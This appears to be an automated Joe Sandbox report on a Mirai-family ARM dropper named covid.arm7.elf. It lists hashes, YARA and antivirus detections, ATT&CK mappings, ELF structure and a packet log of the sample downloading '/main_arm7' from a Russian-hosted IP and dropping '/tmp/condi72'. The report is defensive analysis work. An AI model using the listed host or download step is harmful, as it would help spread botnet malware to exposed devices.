Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
covid.arm7.elf

Overview

General Information

Sample name:covid.arm7.elf
Analysis ID:1584857
MD5:19717d44282070a560373568a601dded
SHA1:832af6d7b14a4ffa1079a87d3dc558e905beaa46
SHA256:5c8dd02d7ea9b6ad5d0b214c970c86eeb3225f323ad7dd4ed5fd46c765f29abd
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:72
Range:0 - 100
Whitelisted:false

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
HTTP GET or POST without a user agent
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1584857
Start date and time:2025-01-06 16:32:10 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 33s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:covid.arm7.elf
Detection:MAL
Classification:mal72.troj.linELF@0/1@0/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: covid.arm7.elf
Command:/tmp/covid.arm7.elf
PID:5531
Exit Code:5
Exit Code Info:
Killed:False
Standard Output:
Loadinggg
Downloaddd
Standard Error:
  • system is lnxubuntu20
  • covid.arm7.elf (PID: 5531, Parent: 5450, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/covid.arm7.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
dump.pcapLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
  • 0x1a06f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1a083:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1a097:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1a0ab:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1a0bf:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1a0d3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1a0e7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1a0fb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1a10f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1a123:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1a137:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1a14b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1a15f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1a173:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1a1ed:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1a201:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1a215:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1a229:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1a23d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1a251:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1a265:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
SourceRuleDescriptionAuthorStrings
/tmp/condi72JoeSecurity_Mirai_8Yara detected MiraiJoe Security
    /tmp/condi72Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
    • 0x17738:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x1774c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x17760:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x17774:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x17788:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x1779c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x177b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x177c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x177d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x177ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x17800:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x17814:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x17828:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x1783c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x17850:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x17864:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x17878:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x1788c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x178a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x178b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x178c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: /tmp/condi72Avira: detection malicious, Label: EXP/ELF.Mirai.Z.A
    Source: covid.arm7.elfReversingLabs: Detection: 42%
    Source: global trafficHTTP traffic detected: GET /main_arm7 HTTP/1.0Data Raw: 00 44 6f 77 6e 6c 6f Data Ascii: Downlo
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: unknownTCP traffic detected without corresponding DNS query: 185.255.135.104
    Source: global trafficHTTP traffic detected: GET /main_arm7 HTTP/1.0Data Raw: 00 44 6f 77 6e 6c 6f Data Ascii: Downlo

    System Summary

    barindex
    Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
    Source: /tmp/condi72, type: DROPPEDMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
    Source: /tmp/condi72, type: DROPPEDMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
    Source: classification engineClassification label: mal72.troj.linELF@0/1@0/0
    Source: /tmp/covid.arm7.elf (PID: 5531)File written: /tmp/condi72Jump to dropped file
    Source: /tmp/covid.arm7.elf (PID: 5531)Queries kernel information via 'uname': Jump to behavior
    Source: covid.arm7.elf, 5531.1.000055def5060000.000055def518e000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
    Source: covid.arm7.elf, 5531.1.00007ffd930b1000.00007ffd930d2000.rw-.sdmpBinary or memory string: 7*;x86_64/usr/bin/qemu-arm/tmp/covid.arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/covid.arm7.elf
    Source: covid.arm7.elf, 5531.1.000055def5060000.000055def518e000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
    Source: covid.arm7.elf, 5531.1.00007ffd930b1000.00007ffd930d2000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: /tmp/condi72, type: DROPPED

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: /tmp/condi72, type: DROPPED
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential Dumping11
    Security Software Discovery
    Remote ServicesData from Local System1
    Non-Application Layer Protocol
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    covid.arm7.elf42%ReversingLabsWin32.Trojan.Mirai
    SourceDetectionScannerLabelLink
    /tmp/condi72100%AviraEXP/ELF.Mirai.Z.A
    No Antivirus matches
    No Antivirus matches
    No contacted domains info
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    185.255.135.104
    unknownRussian Federation
    50113SUPERSERVERSDATACENTERRUfalse
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    185.255.135.104covid.x86.elfGet hashmaliciousMiraiBrowse
    • /main_x86
    byte.mpsl.elfGet hashmaliciousMiraiBrowse
    • /main_mpsl
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    SUPERSERVERSDATACENTERRUcovid.x86.elfGet hashmaliciousMiraiBrowse
    • 185.255.135.104
    byte.mpsl.elfGet hashmaliciousMiraiBrowse
    • 185.255.135.104
    la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
    • 185.206.2.20
    http://osregist.xyz/tdrig/CNBR.htmlGet hashmaliciousUnknownBrowse
    • 185.255.135.223
    Clienter.dll.dllGet hashmaliciousUnknownBrowse
    • 185.40.4.94
    boatnet.sh4.elfGet hashmaliciousMiraiBrowse
    • 147.78.65.71
    boatnet.spc.elfGet hashmaliciousMiraiBrowse
    • 147.78.65.71
    boatnet.m68k.elfGet hashmaliciousMiraiBrowse
    • 147.78.65.71
    boatnet.arm7.elfGet hashmaliciousMiraiBrowse
    • 147.78.65.71
    boatnet.mips.elfGet hashmaliciousMiraiBrowse
    • 147.78.65.71
    No context
    No context
    Process:/tmp/covid.arm7.elf
    File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
    Category:dropped
    Size (bytes):167717
    Entropy (8bit):5.873013822016837
    Encrypted:false
    SSDEEP:3072:uIGWeAqqbIDJpeX7nenaFBHe5Iul0fup1QD3WJUoqM/RXUqHS8vv:LeAqqkperenaFBHe5Ig51QD30ZqM/REE
    MD5:6F6709EC6ABA759860C1900C40CB81CD
    SHA1:ABA61AC34E8998B07233AEE38E47676E4FD3ACCF
    SHA-256:BB3C7EC32C56E0A0D9A6D7E93B9A34F7536A8015D1C297F8799122AD07DA9958
    SHA-512:7448B52838BB6ADAAB56E45FE9C913577B93AF7512276CF2D22F99C9485007B02AC44B52DF462785D5D72E64E7CA2290E1B3CF893B84B45659EC4054D1B3B785
    Malicious:true
    Yara Hits:
    • Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /tmp/condi72, Author: Joe Security
    • Rule: Linux_Trojan_Gafgyt_28a2fe0c, Description: unknown, Source: /tmp/condi72, Author: unknown
    Antivirus:
    • Antivirus: Avira, Detection: 100%
    Reputation:low
    Preview:.ELF..............(.........4...........4. ...(........p...........p...p...........................H...H...............H...H...H.......df..............L...L...L...................Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../.(.......H.....-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../.....H...,...X................... ... -...-.......-......0..M..C...............-.8.....M.....>........... ...0../....p............../......E........-.......M..E...G-......`...p...... ........p..0...0....P..P...P...0....U..........G..../....0....p..@............P.............................E.......E..|0........Q.....p0... .......0....S..................0....S...........P.........}.......E........... ..$0.........../.............D...H...0@-.XP....M..@......H0... ... ...@....T...........P.............0... ... ...@....T........0@..../.L.....P..@-..@.......0....S.................0....R.............
    File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
    Entropy (8bit):4.860637523959368
    TrID:
    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
    File name:covid.arm7.elf
    File size:1'504 bytes
    MD5:19717d44282070a560373568a601dded
    SHA1:832af6d7b14a4ffa1079a87d3dc558e905beaa46
    SHA256:5c8dd02d7ea9b6ad5d0b214c970c86eeb3225f323ad7dd4ed5fd46c765f29abd
    SHA512:3d5a8afad4f4380e4ecb615b233aae4dbe85132ca0f49be0424dcc8b6468c51a247c57adea9f39fe2cb6795a2bc0ced616c147a1d7b487a6b0aa07f03ccbd8b1
    SSDEEP:24:uTchKGpa7Urz/jlfD+XK1G9Vev3gRGRP9ilBBuLlZLRn69gW29:ughKGpa7UrLZD9RlPmBukJ29
    TLSH:FD31D291B6D14DBCC4F411BEAE5B0311B3679F00E1CB7123D31CA368AD2AE3C6D2645A
    File Content Preview:.ELF..............(.........4...........4. ...(.....................p...p...............p...p...p.......................p...p...p...................Q.td.........................................8...<...4...........(.."...#...../...-.......M................

    ELF header

    Class:ELF32
    Data:2's complement, little endian
    Version:1 (current)
    Machine:ARM
    Version Number:0x1
    Type:EXEC (Executable file)
    OS/ABI:UNIX - System V
    ABI Version:0
    Entry Point Address:0x83ac
    Flags:0x4000002
    ELF Header Size:52
    Program Header Offset:52
    Program Header Size:32
    Number of Program Headers:4
    Section Header Offset:1224
    Section Header Size:40
    Number of Section Headers:7
    Header String Table Index:6
    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
    NULL0x00x00x00x00x0000
    .textPROGBITS0x80c00xc00x3600x00x6AX0016
    .rodataPROGBITS0x84200x4200x500x10x32AMS004
    .tbssNOBITS0x104700x4700x80x00x403WAT004
    .gotPROGBITS0x104700x4700x100x40x3WA004
    .ARM.attributesARM_ATTRIBUTES0x00x4800x140x00x0001
    .shstrtabSTRTAB0x00x4940x340x00x0001
    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
    LOAD0x00x80000x80000x4700x4705.27870x5R E0x8000.text .rodata
    LOAD0x4700x104700x104700x100x100.33730x6RW 0x8000.tbss .got
    TLS0x4700x104700x104700x00x80.00000x4R 0x4.tbss
    GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
    TimestampSource PortDest PortSource IPDest IP
    Jan 6, 2025 16:32:56.467063904 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:56.550168037 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:56.550241947 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:56.551326990 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:56.556092024 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.258852959 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.258868933 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.258882999 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.258892059 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.258955956 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.258955956 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.258955956 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.258955956 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.259206057 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.259217978 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.259231091 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.259251118 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.259251118 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.259251118 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.259278059 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.259290934 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.259303093 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.259321928 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.259321928 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.259351969 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.263983965 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.264019012 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.264044046 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.264055967 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.264085054 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.264085054 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.264110088 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.264142036 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.377262115 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.377274990 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.377285957 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.377346039 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.377346039 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.382050037 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.382064104 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.382112026 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.382127047 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.382209063 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.386722088 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.386737108 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.386749029 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.386817932 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.386831999 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.387080908 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.391455889 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.391470909 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.391489983 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.391501904 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.391514063 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.392035961 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.396220922 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.396234989 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.396333933 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.396348000 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.396994114 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.400947094 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.400959969 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.401040077 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.401051998 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.402045965 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.495317936 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.495343924 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.495485067 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.495495081 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.495580912 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.495629072 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.495640039 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.495870113 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.495981932 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.496030092 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.496042013 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.496103048 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.496495962 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.496506929 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.496517897 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.496871948 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.496906042 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.496917009 CET8040906185.255.135.104192.168.2.15
